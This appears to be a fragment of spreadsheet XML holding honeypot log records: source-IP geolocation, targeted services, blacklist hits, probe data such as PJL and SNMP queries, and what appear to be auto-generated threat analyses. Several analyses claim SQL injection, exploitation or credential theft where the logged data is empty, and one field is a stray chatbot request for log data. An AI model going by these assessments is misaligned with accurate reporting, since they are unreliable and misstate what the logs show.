    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity was detected, as telnet service was not accessed or there is no available information about this service. This could indicate that the honeypot's telnet service was not interacted with during monitoring period. It may also suggest that the service is currently inactive or disabled. &amp;&amp; No malicious activity detected for TELNET service, as no data was received during the monitoring period. _x000a_The absence of data could indicate that no connection attempt was made or it was successful and no data was transmitted. _x000a_This suggests a lack of suspicious activity for this particular service at the time of monitoring."/>
    <s v="Port Scan &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="733"/>
    <x v="733"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T19:04:36"/>
    <d v="2025-04-26T19:04:36"/>
    <d v="2025-04-26T19:04:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Bradford"/>
    <s v="Bradford"/>
    <s v="2654993"/>
    <s v="NA"/>
    <s v="53.7939"/>
    <s v="-1.75206"/>
    <s v="62044"/>
    <s v="ZSCALER-EMEA"/>
    <s v="Zscaler Switzerland GmbH"/>
    <s v="corporate"/>
    <s v="Zscaler Man1"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93a1:ed08"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="Possible login attempt from a browser with a suspiciously high Chrome version number, likely an attempt to bypass security measures or use outdated software. _x000a_Browser is likely trying to access a service using fake credentials, attempting to gain unauthorized access. This could be a brute force attack or phishing attempt. &amp;&amp; A user is attempting to log in using a fake Mozilla browser with an unusually high version of Chrome, suggesting potential automated or malicious activity. The Windows 10 operating system and browser fingerprinting may be used for tracking or identity theft purposes. This could be a sign of reconnaissance or credential harvesting. &amp;&amp; An attempt to access a login page with a fake or stolen user agent string likely used for identity spoofing. This is suspicious as real browsers would not match the reported version and configuration so closely. It may be an automated tool trying to crack passwords. &amp;&amp; A user with a fake or stolen identity is trying to gain unauthorized access to an HTTP service by mimicking a legitimate browser and IP address._x000a_This attempt suggests a potential phishing or impersonation attack._x000a_The user is likely using a compromised account or credentials for malicious purposes."/>
    <s v="Brute Force Attempt &amp;&amp; Brute Force Attack &amp;&amp; Credential Theft &amp;&amp; Brute Force Login"/>
  </r>
  <r>
    <x v="734"/>
    <x v="734"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T18:40:27"/>
    <d v="2024-08-13T19:29:42"/>
    <d v="2025-04-26T18:40:27"/>
    <n v="86"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="43968&amp;&amp;30840&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (Jubilee Hills)"/>
    <s v="1269843"/>
    <s v="500033"/>
    <s v="17.4324"/>
    <s v="78.4142"/>
    <s v="45884"/>
    <s v="RVR Infrastructure Limited Service provider hyderabad india"/>
    <s v="Rvr Digital Infrastructures Limited"/>
    <s v="business"/>
    <s v="Rvr Digital Infrastructures Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f2:9965"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="735"/>
    <x v="735"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T18:28:00"/>
    <d v="2025-04-26T18:28:00"/>
    <d v="2025-04-26T18:28:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Bhopal"/>
    <s v="Bhopal"/>
    <s v="1275841"/>
    <s v="NA"/>
    <s v="23.2547"/>
    <s v="77.4029"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:3ee4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected. _x000a__x000a_Possible explanation for this is that either no legitimate or malicious user attempted to connect via TELNET, or the connection was blocked before it could be logged._x000a__x000a_Activity appears to be low-risk or inconclusive. &amp;&amp; No suspicious activity detected as TELNET service logs show &quot;NA&quot;, indicating no activity or connection attempt was made. This suggests the honeypot did not receive any incoming TELNET connections during the monitored period. The lack of activity does not necessarily indicate malicious behavior, but rather an absence of attempted access to this specific service."/>
    <m/>
  </r>
  <r>
    <x v="736"/>
    <x v="736"/>
    <s v="NA&amp;&amp;cm125-59-62-244.hkcable.com.hk"/>
    <x v="0"/>
    <d v="2025-04-26T18:12:41"/>
    <d v="2024-12-08T03:22:13"/>
    <d v="2025-04-26T18:12:41"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NTW"/>
    <s v="Tsuen Wan"/>
    <s v="NA"/>
    <s v="Chai Wan Kok"/>
    <s v="1820001"/>
    <s v="NA"/>
    <s v="22.3728"/>
    <s v="114.107"/>
    <s v="9908"/>
    <s v="Hong Kong Cable Television Limited"/>
    <s v="Hong Kong Cable Television Limited"/>
    <s v="residential"/>
    <s v="Hong Kong Cable TV Ltd - Cable Multi-Media Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d3b:3ef4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is insufficient information available for analysis._x000a_No activity detected._x000a_Data is empty or missing."/>
    <s v="There is no log data provided. Please provide the actual log data for analysis. I will then identify the types of attacks based on the data. _x000a__x000a_Please provide the log data, and I'll be happy to assist you in identifying the attack types."/>
  </r>
  <r>
    <x v="737"/>
    <x v="737"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T18:12:36"/>
    <d v="2024-12-18T10:24:41"/>
    <d v="2025-04-26T18:12:36"/>
    <n v="79"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H9"/>
    <s v="23&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Ubatuba"/>
    <s v="Ubatuba"/>
    <s v="3445847"/>
    <s v="NA"/>
    <s v="-23.4339"/>
    <s v="-45.0711"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b115"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="738"/>
    <x v="738"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T17:34:01"/>
    <d v="2025-04-26T17:34:01"/>
    <d v="2025-04-26T17:34:01"/>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3b60:5627"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity was detected. No malicious attempts were made to access this service. Service appears secure. &amp;&amp; No suspicious activity detected for TELNET service. This indicates either the service is inactive or no attempt was made to access it. Normal operation of the system without any malicious attempts."/>
    <m/>
  </r>
  <r>
    <x v="739"/>
    <x v="739"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T17:01:36"/>
    <d v="2025-04-26T16:35:20"/>
    <d v="2025-04-26T17:01:36"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="BR"/>
    <s v="Bihar"/>
    <s v="Patna"/>
    <s v="Kurthaur"/>
    <s v="11011476"/>
    <s v="NA"/>
    <s v="25.562"/>
    <s v="85.1217"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="RELIANCEJIO"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1994-08-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983b:90b0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No direct connection attempt detected, but presence of 'MSSQL' in log suggests potential SQL database exploitation or probing for vulnerabilities is likely underway. &amp;&amp; Malicious actors attempted to connect to an MSSQL service, which could indicate a potential exploitation attempt or scanning activity for vulnerability assessment. This may be part of a larger reconnaissance effort or even an initial step towards gaining unauthorized access. It is unclear if the attempt was successful but it does signify suspicious activity."/>
    <m/>
  </r>
  <r>
    <x v="740"/>
    <x v="740"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T16:57:57"/>
    <d v="2025-04-26T16:57:57"/>
    <d v="2025-04-26T16:57:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:83ec"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="741"/>
    <x v="741"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T15:50:40"/>
    <d v="2024-07-08T16:49:00"/>
    <d v="2025-04-26T15:50:40"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;3306&amp;&amp;6379"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Group"/>
    <s v="residential"/>
    <s v="VIETTEL"/>
    <s v="2010-04-27"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.72.40.143,53981)}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b48:288f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No MySQL activity detected, suggesting potential scanning or probing for vulnerabilities. This could be indicative of reconnaissance by malicious actors. No actual data transfer occurred, implying a pre-exploitation phase. &amp;&amp; This log indicates a potential MySQL database scan, as no activity was detected on this service. _x000a_The lack of data may suggest an unsuccessful or incomplete scan attempt._x000a_MySQL database access is likely being probed for vulnerabilities."/>
    <m/>
  </r>
  <r>
    <x v="742"/>
    <x v="742"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T15:50:39"/>
    <d v="2023-12-03T10:17:00"/>
    <d v="2025-04-26T15:50:39"/>
    <n v="267"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;62110&amp;&amp;29284&amp;&amp;1433&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad"/>
    <s v="1269843"/>
    <s v="NA"/>
    <s v="17.3841"/>
    <s v="78.4564"/>
    <s v="18209"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="business"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="2009-11-10"/>
    <s v="Beam-Core"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b752:178"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible malicious SQL injection attempt detected, an attacker is trying to exploit the system's database via a missing parameter. This could be a sign of a malicious actor probing for vulnerabilities in the application's security. It indicates a potential attack on sensitive data stored within the database. &amp;&amp; This log indicates an attempted SQL injection attack where attackers try to inject malicious code into a database system via a web application._x000a_The attack is likely attempting to extract sensitive information or disrupt the system's functionality._x000a_No specific SQL syntax was involved in this attempt."/>
    <m/>
  </r>
  <r>
    <x v="743"/>
    <x v="743"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T15:43:47"/>
    <d v="2023-07-30T21:43:02"/>
    <d v="2025-04-26T15:43:47"/>
    <n v="1265"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_SOCKS5_H30&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;80&amp;&amp;389&amp;&amp;443&amp;&amp;1080&amp;&amp;22&amp;&amp;445&amp;&amp;9100&amp;&amp;5900&amp;&amp;31891&amp;&amp;NA&amp;&amp;143&amp;&amp;3306&amp;&amp;1433&amp;&amp;23&amp;&amp;21&amp;&amp;110&amp;&amp;5432&amp;&amp;60038&amp;&amp;3389&amp;&amp;55917&amp;&amp;6379&amp;&amp;1521&amp;&amp;57300&amp;&amp;49472"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="103"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="NA&amp;&amp;connection&amp;&amp;command&amp;&amp;query&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.5,63180)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.5,63194)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.5,63196)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1805"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unknown connection attempt to Oracle service, indicating possible SQL injection or unauthorized access attempt. _x000a_The absence of &quot;NA&quot; might indicate a successful login or authentication. _x000a_This suggests malicious actor is trying to exploit vulnerable Oracle installation. &amp;&amp; No suspicious activity detected, data is missing for Oracle service connection attempt. The system was unable to gather information about the attempted connection. No malicious action recorded."/>
    <m/>
  </r>
  <r>
    <x v="744"/>
    <x v="744"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T15:42:52"/>
    <d v="2025-02-08T09:44:05"/>
    <d v="2025-04-26T15:42:52"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Jhajjar"/>
    <s v="Shāhpur (Phase IV)"/>
    <s v="10555202"/>
    <s v="NA"/>
    <s v="28.4924"/>
    <s v="77.0813"/>
    <s v="10029"/>
    <s v="SHYAM SPECTRA PVT LTD"/>
    <s v="Shyam Spectra Pvt Ltd"/>
    <s v="business"/>
    <s v="Shyam Spectra Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
